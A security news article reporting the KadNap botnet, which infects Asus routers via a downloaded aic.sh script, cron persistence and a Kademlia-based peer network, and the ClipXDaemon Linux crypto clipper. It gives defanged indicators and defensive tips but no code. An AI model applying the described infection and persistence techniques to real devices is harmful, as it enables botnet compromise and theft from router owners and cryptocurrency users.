Cybersecurity researchers have uncovered a sophisticated malware campaign involving a threat dubbed KadNap, which primarily targets Asus routers and other edge devices to build a stealthy proxy botnet. The malware has compromised over 14,000 devices globally, with more than 60% of infections in the U.S., according to Black Lotus Labs at Lumen.
KadNap uses a custom implementation of the Kademlia Distributed Hash Table (DHT) protocol, enabling devices to connect with command-and-control (C2) servers in a peer-to-peer network that hides malicious traffic within legitimate network activity. This makes the botnet resilient to detection and disruption.
Infection and Deployment Mechanism
The attack begins with a shell script named aic.sh, downloaded from the C2 server (212.104.141[.]140). This script creates a cron job to fetch itself every hour, renames the file to .asusrouter, and executes it. The script subsequently downloads a malicious ELF binary called kad, which deploys KadNap on ARM and MIPS-based devices.
KadNap collects system uptime and NTP server time to generate a hash that helps locate peers in the decentralized network. The malware also closes SSH port 22 and extracts C2 IP addresses and ports for communication.
Once deployed, compromised devices are marketed through a proxy service called Doppelgänger (doppelganger[.]shop), a rebrand of Faceless, offering proxies in over 50 countries with claims of “100% anonymity.” Bots from these devices are reportedly abused by threat actors in the wild.
Defensive Recommendations
SOHO router users are advised to:
- Keep firmware updated
- Reboot devices regularly
- Change default passwords
- Secure management interfaces
- Replace unsupported or end-of-life devices
The KadNap botnet is notable for using a peer-to-peer network to avoid detection, making it difficult for defenders to contain malicious proxy activity.
New Linux Threat: ClipXDaemon Targets Cryptocurrency Users
In a related disclosure, cybersecurity firm Cyble revealed a new Linux malware called ClipXDaemon. This clipper malware targets cryptocurrency users by intercepting copied wallet addresses in X11 sessions and replacing them with attacker-controlled addresses in real time.
The malware operates entirely in memory, avoids Wayland sessions to bypass security controls, and employs stealth techniques such as process masquerading. ClipXDaemon affects wallets for Bitcoin, Ethereum, Litecoin, Monero, Tron, Dogecoin, Ripple, and TON. Unlike traditional malware, it contains no command-and-control logic and monetizes victims directly through clipboard hijacking.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
